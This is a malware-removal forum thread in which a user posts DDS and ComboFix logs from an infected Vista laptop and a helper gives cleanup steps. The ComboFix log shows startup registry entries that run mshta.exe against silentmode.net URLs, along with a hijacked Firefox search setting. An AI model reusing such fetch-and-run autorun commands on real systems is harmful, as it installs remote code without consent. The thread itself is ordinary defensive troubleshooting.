FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprpchromebrowserrecordext.dll
FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprphtml5videoshim.dll
FF - plugin: c:\users\gagan\appdata\local\google\update\1.3.21.111\npGoogleUpdate3.dll
FF - plugin: c:\users\gagan\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgoogletalk.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgtpo3dautoplugin.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_235.dll
FF - plugin: c:\windows\system32\npDeployJava1.dll
FF - plugin: c:\windows\system32\npmproxy.dll
.
---- FIREFOX POLICIES ----
.
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2012-3-20 171064]
R1 MpKsl0ef4776f;MpKsl0ef4776f;c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys [2012-5-28 29904]
R2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-6-19 21504]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\progra~1\mcafee\sitead~1\mcsacore.exe [2011-5-24 95200]
R2 TeamViewer6;TeamViewer 6;c:\program files\teamviewer\version6\TeamViewer_Service.exe [2011-1-27 2253688]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\macromed\flash\FlashPlayerUpdateService.exe [2012-4-7 257696]
S3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2012-3-20 74112]
S3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\NisSrv.exe [2012-3-26 214952]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]
S3 WSDPrintDevice;WSD Print Support via UMB;c:\windows\system32\drivers\WSDPrint.sys [2008-6-19 16896]
S4 dldt_device;dldt_device;c:\windows\system32\dldtcoms.exe -service --> c:\windows\system32\dldtcoms.exe -service [?]
S4 dldtCATSCustConnectService;dldtCATSCustConnectService;c:\windows\system32\spool\drivers\w32x86\3\dldtserv.exe [2009-7-9 98984]
S4 Giraffic;Veoh Giraffic Video Accelerator;c:\program files\giraffic\veoh_girafficwatchdog.exe --service --> c:\program files\giraffic\Veoh_GirafficWatchdog.exe --service [?]
S4 StarWindServiceAE;StarWind AE Service;c:\program files\alcohol soft\alcohol 52\starwind\StarWindServiceAE.exe [2007-5-28 275968]
.
=============== Created Last 30 ================
.
2012-05-28 05:57:08	29904	----a-w-	c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys
2012-05-28 05:06:52	6737808	----a-w-	c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\mpengine.dll
2012-05-23 20:07:25	6737808	------w-	c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2012-05-22 05:16:47	713784	------w-	c:\programdata\microsoft\microsoft antimalware\definition updates\{f78cef23-eb95-4ded-8458-48e319614326}\gapaengine.dll
2012-05-22 05:09:57	--------	d-----w-	c:\program files\Microsoft Security Client
2012-05-19 08:37:25	6737808	----a-w-	c:\programdata\microsoft\windows defender\definition updates\{3070ec37-30ca-43ae-ac15-bbe0716a8aad}\mpengine.dll
2012-05-19 05:43:51	--------	d-----w-	c:\programdata\vsint
2012-05-14 22:57:56	53120	----a-w-	c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57:42	914304	----a-w-	c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57:41	31232	----a-w-	c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57:34	1404928	----a-w-	c:\program files\common files\microsoft shared\ink\InkObj.dll
2012-05-14 22:57:32	936960	----a-w-	c:\program files\common files\microsoft shared\ink\journal.dll
2012-05-14 22:57:20	1069056	----a-w-	c:\windows\system32\DWrite.dll
2012-05-14 22:57:19	219648	----a-w-	c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57:19	1172480	----a-w-	c:\windows\system32\d3d10warp.dll
2012-05-14 22:57:18	683008	----a-w-	c:\windows\system32\d2d1.dll
2012-05-14 22:57:18	160768	----a-w-	c:\windows\system32\d3d10_1.dll
2012-05-14 22:56:51	3550080	----a-w-	c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56:50	3602816	----a-w-	c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56:49	2044928	----a-w-	c:\windows\system32\win32k.sys
2012-05-09 04:58:39	592824	----a-w-	c:\program files\mozilla firefox\gkmedias.dll
2012-05-09 04:58:39	44472	----a-w-	c:\program files\mozilla firefox\mozglue.dll
.
==================== Find3M ====================
.
2012-05-05 06:08:36	70304	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2012-05-05 06:08:36	419488	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2012-04-04 19:56:40	22344	----a-w-	c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44:12	74112	----a-w-	c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44:12	171064	----a-w-	c:\windows\system32\drivers\MpFilter.sys
2012-02-29 15:11:45	5120	----a-w-	c:\windows\system32\wmi.dll
2012-02-29 15:11:42	172032	----a-w-	c:\windows\system32\wintrust.dll
2012-02-29 15:09:53	157696	----a-w-	c:\windows\system32\imagehlp.dll
2012-02-29 13:32:37	12800	----a-w-	c:\windows\system32\drivers\fs_rec.sys
2012-02-28 11:30:48	916992	----a-w-	c:\windows\system32\wininet.dll
2012-02-28 11:25:41	43520	----a-w-	c:\windows\system32\licmgr10.dll
2012-02-28 11:25:17	1469440	----a-w-	c:\windows\system32\inetcpl.cpl
2012-02-28 11:25:03	71680	----a-w-	c:\windows\system32\iesetup.dll
2012-02-28 11:25:03	109056	----a-w-	c:\windows\system32\iesysprep.dll
2012-02-28 10:07:57	385024	----a-w-	c:\windows\system32\html.iec
2012-02-28 08:12:52	133632	----a-w-	c:\windows\system32\ieUnatt.exe
2012-02-28 08:08:30	1638912	----a-w-	c:\windows\system32\mshtml.tlb
.
============= FINISH: 3:18:17.35 ===============


----------



## gagraptor (May 23, 2012)

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2011-08-26.01)
.
Microsoft® Windows Vista Home Premium 
Boot Device: \Device\HarddiskVolume2
Install Date: 7/31/2007 3:06:08 PM
System Uptime: 5/28/2012 1:45:32 AM (2 hours ago)
.
Motherboard: TOSHIBA | | IALAA
Processor: AMD Turion(tm) 64 X2 Mobile Technology TL-56 | Socket M2/S1G1 | 1800/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 231 GiB total, 26.845 GiB free.
E: is CDROM ()
F: is CDROM ()
G: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft 6to4 Adapter
Device ID: ROOT\*6TO4MP\0000
Manufacturer: Microsoft
Name: Microsoft 6to4 Adapter
PNP Device ID: ROOT\*6TO4MP\0000
Service: tunnel
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft Tun Miniport Adapter
Device ID: ROOT\*TUNMP\0001
Manufacturer: Microsoft
Name: Teredo Tunneling Pseudo-Interface
PNP Device ID: ROOT\*TUNMP\0001
Service: tunmp
.
Class GUID: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Description: Canon MX860 ser Network
Device ID: ROOT\CANON_IJ_NETWORK\0000
Manufacturer: Canon
Name: Canon MX860 ser Network
PNP Device ID: ROOT\CANON_IJ_NETWORK\0000
Service: StillCam
.
==== System Restore Points ===================
.
.
==== Installed Programs ======================
.
µTorrent
Adobe Flash Player 11 Plugin
Adobe Flash Player ActiveX
Adobe Reader 8.1.5
Adobe Shockwave Player
Adobe® Photoshop® Album Starter Edition 3.2
AGEIA PhysX v7.07.09
Akamai NetSession Interface
Akamai NetSession Interface Service
ALPS Touch Pad Driver
Apple Application Support
Apple Mobile Device Support
Apple Software Update
Atheros Driver Installation Program
ATI Catalyst Install Manager
ATI Uninstaller
Bejeweled Deluxe 1.87
Bonjour
Camera Assistant Software for Toshiba
Canon IJ Network Scan Utility
Canon IJ Network Tool
Canon MX860 series MP Drivers
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center Localization Chinese Standard
Catalyst Control Center Localization Chinese Traditional
Catalyst Control Center Localization Dutch
Catalyst Control Center Localization Finnish
Catalyst Control Center Localization French
Catalyst Control Center Localization German
Catalyst Control Center Localization Greek
Catalyst Control Center Localization Hungarian
Catalyst Control Center Localization Italian
Catalyst Control Center Localization Japanese
Catalyst Control Center Localization Korean
Catalyst Control Center Localization Norwegian
Catalyst Control Center Localization Polish
Catalyst Control Center Localization Portuguese
Catalyst Control Center Localization Russian
Catalyst Control Center Localization Spanish
Catalyst Control Center Localization Swedish
Catalyst Control Center Localization Thai
Catalyst Control Center Localization Turkish
ccc-core-static
ccc-utility
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CCleaner
CD/DVD Drive Acoustic Silencer
CloneDVD2
Counter-Strike 1.0
Counter-Strike 1.6
Counter Strike 1.6 - By PirocaHP.F!N4LShare
Counter Strike 1.6 - Pack 112 Mapas - By PirocaHP F!N4LShare
D3DX10
Dell Driver Download Manager
Dell V305
DivX Converter
DivX Plus DirectShow Filters
DivX Setup
DivX Version Checker
DVD MovieFactory for TOSHIBA
DVDFab (Platinum/Gold/HD Decrypter) (Option: Mobile) 5.0.9.0
EA SPORTS(TM) Cricket 07
EPSON Easy Photo Print
EPSON WorkForce 30 Series Printer Uninstall
Google Chrome
Google Talk (remove only)
Google Talk Plugin
HD Tune 2.55
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
iPhone Configuration Utility
iTunes
Java Auto Updater
Java(TM) 6 Update 29
Java(TM) 7 Update 3
Java(TM) SE Development Kit 7 Update 2
Java(TM) SE Runtime Environment 6
JavaFX 2.0.2 SDK
JavaFX 2.0.3
K-Lite Mega Codec Pack 6.2.0
KB408682
Magic DVD Ripper V5.1.1
Magic ISO Maker v5.5 (build 0272)
Malwarebytes Anti-Malware version 1.61.0.1400
Max Payne
McAfee SiteAdvisor
Media Player Classic - Home Cinema v. 1.3.1249.0
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 4 Client Profile
Microsoft Application Error Reporting
Microsoft Flight Simulator X
Microsoft Office XP Professional with FrontPage
Microsoft Primary Interoperability Assemblies 2005
Microsoft Security Client
Microsoft Security Essentials
Microsoft Silverlight
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Works
Microsoft XML Parser
Mozilla Firefox 11.0 (x86 en-US)
MSVC80_x86
MSVCRT
MSXML 4.0 SP2 (KB927978)
MSXML 4.0 SP2 (KB936181)
MSXML 4.0 SP2 (KB941833)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MSXML 4.0 SP2 Parser and SDK
Need for Speed Underground 2
Need for Speed Most Wanted
Nero BackItUp
Nero BackItUp and Burn
Nero BurnRights
Nero Express
Nero RescueAgent
neroxml
Oblivion
OGA Notifier 2.0.0048.0
Pando Media Booster
PC Connectivity Solution
PCFriendly
Picasa 2
QuickTime
RealNetworks - Microsoft Visual C++ 2008 Runtime
Realtek 8169 PCI, 8168 and 8101E PCIe Ethernet Network Card Driver for Windows Vista
Realtek High Definition Audio Driver
RealUpgrade 1.1
Safari
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2657424)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2446708)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2478663)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2518870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2539636)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2572078)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2633870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)
Security Update for Windows Media Encoder (KB2447961)
Security Update for Windows Media Encoder (KB954156)
Security Update for Windows Media Encoder (KB979332)
Segoe UI
Skins
Skype 3.5
Spelling Dictionaries Support For Adobe Reader 8
Switch Sound File Converter
Synaptics Pointing Device Driver
Tales of Monkey Island
TeamViewer 6
Texas Instruments PCIxx21/x515/xx12 drivers.
TIPCI
TOSHIBA Assist
TOSHIBA Disc Creator
TOSHIBA DVD PLAYER
TOSHIBA Extended Tiles for Windows Mobility Center
TOSHIBA Flash Cards Support Utility
TOSHIBA Hardware Setup
Toshiba Registration
TOSHIBA SD Memory Utilities
TOSHIBA Software Modem
TOSHIBA Software Upgrades
TOSHIBA Supervisor Password
TOSHIBA Value Added Package
TuneUp Companion 2.2.7
TypingMaster Pro
Unity Web Player
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217)
Utility Common Driver
uTorrentControl Toolbar
VC80CRTRedist - 8.0.50727.6195
VCRedistSetup
Veoh Giraffic Video Accelerator
Veoh Web Player
VeohTV BETA
VideoLAN VLC media player 0.8.6f
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Messenger
Windows Live Photo Common
Windows Live PIMT Platform
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Media Encoder 9 Series
Windows Media Player Firefox Plugin
WinImage
WinRAR archiver
Yahoo! Detect
Yahoo! Install Manager
Yahoo! Messenger
Zeus & Poseidon
.
==== Event Viewer Messages From Past Week ========
.
5/28/2012 12:57:13 AM, Error: Microsoft-Windows-SharedAccess_NAT [31004] - The DNS proxy agent was unable to allocate 0 bytes of memory. This may indicate that the system is low on virtual memory, or that the memory manager has encountered an internal error.
5/28/2012 1:48:09 AM, Error: Microsoft-Windows-DistributedCOM [10016] - The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
5/28/2012 1:47:38 AM, Error: Service Control Manager [7000] - The Parallel port driver service failed to start due to the following error: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
5/28/2012 1:47:31 AM, Error: PlugPlayManager [12] - The device 'PIONEER DVD-RW DVR-K17LF ATA Device' (IDE\CdRomPIONEER_DVD-RW_DVR-K17LF________________4.53____\5&383a5e59&0&0.0.0) disappeared from the system without first being prepared for removal.
5/28/2012 1:47:27 AM, Error: cdrom [15] - The device, \Device\CdRom0, is not ready for access yet.
5/28/2012 1:47:27 AM, Error: atapi [11] - The driver detected a controller error on \Device\Ide\IdePort2.
5/23/2012 3:53:51 PM, Error: EventLog [6008] - The previous system shutdown at 3:52:17 PM on 5/23/2012 was unexpected.
.
==== End Of File ===========================


----------



## gagraptor (May 23, 2012)

also i don't know if it helps my physical memory usage always is above 50%


----------



## Mark1956 (May 7, 2011)

Ok, thanks for the logs. Please now follow this to run Combofix and post the log.

IMPORTANT
I see you have a *P2P File Sharing Program* installed on your system: *uTorrent*.
As long as you continue to use these types of programs you can expect to get infected.
P2P file sharing is one of the most common sources for picking up infections.
Please uninstall the program from your system in *Programs & Features* via the *Control Panel.*
If you insist in keeping it on your system then please *DO NOT USE IT* until we are finished.

*STEP 1*

*NOTE:* If you have already used Combofix please delete the icon from your desktop.

Please download DeFogger and save it to your desktop.
Once downloaded, double-click on the *DeFogger* icon to start the tool.
The application window will appear.
You should now click on the *Disable* button to disable your CD Emulation drivers.
When it prompts you whether or not you want to continue, please click on the *Yes* button to continue.
When the program has completed you will see a *Finished!* message. Click on the *OK* button to exit the program.
If CD Emulation programs are present and have been disabled, *DeFogger* will now ask you to reboot the machine. Please allow it to do so by clicking on the *OK* button.
*STEP 2*

Please download *ComboFix*







from one of the locations below and *save it to your Desktop. <-Important!!!*

Download Mirror #1
Download Mirror #2
Be sure to print out and follow these instructions: *A guide and tutorial on using ComboFix*

*Vista*/*Windows 7* users can skip the Recovery Console instructions and use the Windows DVD to boot into the Vista Recovery Environment or Windows 7 System Recovery Options if something goes awry. If you do not have a Windows 7 DVD then please create a Windows 7 Repair Disc. *XP* users need to install the Recovery Console first.

Temporarily *disable* your *anti-virus*, script blocking and any *anti-malware* real-time protection _*before*_ performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause _"unpredictable results"_. Click this link to see a list of such programs and how to disable them.
If ComboFix detects an older version of itself, you will be asked to update the program.
ComboFix will begin by showing a Disclaimer. Read it and click *I Agree* if you want to continue.
Follow the prompts and click on *Yes* to continue scanning for malware.
If using Windows 7 or Vista and you receive a UAC prompt asking if you want to continue running the program, you should press the *Continue* button.
When finished, please copy and paste the contents of C:\*ComboFix.txt* (_which will open after reboot_) in your next reply.
Be sure to *re-enable* your anti-virus and other security programs.
_-- Do not touch your mouse/keyboard until the ComboFix scan has completed, as this may cause the process to stall or the computer to lock._
_-- ComboFix will temporarily disable your desktop, and if interrupted may leave it disabled. If this occurs, please reboot to restore it._
_-- ComboFix disables autorun of all CD, floppy and USB devices to assist with malware removal and increase security._
If you no longer have access to your Internet connection after running ComboFix, please reboot to restore it. If that does not restore the connection, then follow the instructions for Manually restoring the Internet connection provided in the "_How to Guide_" you printed out earlier.


> *Do NOT use ComboFix* unless you have been instructed to do so by a Malware Removal Expert. It is a powerful tool intended by its creator to be used under the guidance and supervision of an expert, *NOT for general public or personal use*. *Using this tool incorrectly could lead to serious problems with your operating system such as preventing it from ever starting again.* This site, sUBs and myself *will not* be responsible for any damage caused to your machine by misusing or running ComboFix on your own. Please read *ComboFix's Disclaimer*.


----------



## gagraptor (May 23, 2012)

ComboFix 12-05-28.05 - GAGAN 05/28/2012 22:36:29.1.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.999 [GMT -4:00]
Running from: c:\users\GAGAN\Downloads\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\programdata\xp
c:\programdata\xp\EBLib.dll
c:\programdata\xp\TPwSav.sys
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome.manifest
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome\content\overlay.xul
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\install.rdf
c:\windows\system32\CTF
c:\windows\system32\CTF\ctfmon.txt
c:\windows\system32\CTF\Links\OtherProducts.html
.
.
((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-29 )))))))))))))))))))))))))))))))
.
.
2012-05-28 05:06 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A66FBB99-C8AC-44BC-83F6-4037B1F477F7}\mpengine.dll
2012-05-23 20:07 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2012-05-22 05:16 . 2012-05-22 05:16	713784	------w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
2012-05-22 05:09 . 2012-05-22 05:10	--------	d-----w-	c:\program files\Microsoft Security Client
2012-05-19 08:37 . 2012-05-08 16:40	6737808	----a-w-	c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
2012-05-19 05:43 . 2012-05-19 09:50	--------	d-----w-	c:\programdata\vsint
2012-05-14 22:57 . 2012-03-20 23:28	53120	----a-w-	c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57 . 2012-03-30 12:39	914304	----a-w-	c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57 . 2012-03-29 13:39	31232	----a-w-	c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57 . 2012-02-01 15:10	1404928	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
2012-05-14 22:57 . 2012-02-01 15:10	936960	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2012-05-14 22:57 . 2012-02-29 13:41	1069056	----a-w-	c:\windows\system32\DWrite.dll
2012-05-14 22:57 . 2012-03-01 14:46	219648	----a-w-	c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57 . 2012-02-29 14:08	1172480	----a-w-	c:\windows\system32\d3d10warp.dll
2012-05-14 22:57 . 2012-03-01 14:46	160768	----a-w-	c:\windows\system32\d3d10_1.dll
2012-05-14 22:57 . 2012-02-29 13:44	683008	----a-w-	c:\windows\system32\d2d1.dll
2012-05-14 22:56 . 2012-04-03 08:16	3550080	----a-w-	c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56 . 2012-04-03 08:16	3602816	----a-w-	c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56 . 2012-04-02 13:36	2044928	----a-w-	c:\windows\system32\win32k.sys
2012-05-09 04:58 . 2012-05-09 04:58	592824	----a-w-	c:\program files\Mozilla Firefox\gkmedias.dll
2012-05-09 04:58 . 2012-05-09 04:58	44472	----a-w-	c:\program files\Mozilla Firefox\mozglue.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-05-05 06:08 . 2012-04-07 05:22	419488	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2012-05-05 06:08 . 2011-06-14 22:11	70304	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2012-04-04 19:56 . 2010-02-20 07:40	22344	----a-w-	c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44 . 2012-03-21 00:44	74112	----a-w-	c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44 . 2012-03-21 00:44	171064	----a-w-	c:\windows\system32\drivers\MpFilter.sys
2012-02-29 15:11 . 2012-04-14 06:43	5120	----a-w-	c:\windows\system32\wmi.dll
2012-02-29 15:11 . 2012-04-14 06:43	172032	----a-w-	c:\windows\system32\wintrust.dll
2012-02-29 15:09 . 2012-04-14 06:43	157696	----a-w-	c:\windows\system32\imagehlp.dll
2012-02-29 13:32 . 2012-04-14 06:43	12800	----a-w-	c:\windows\system32\drivers\fs_rec.sys
2012-05-09 04:58 . 2011-06-08 03:45	97208	----a-w-	c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
2011-05-09 08:49	176936	----a-w-	c:\program files\uTorrentControl\prxtbuTor.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1" [?]
"RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP" [?]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
"Skytel"="Skytel.exe" [2007-05-29 1826816]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
backup=c:\windows\pss\Metacafe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
backupExtension=.CommonStartup
.
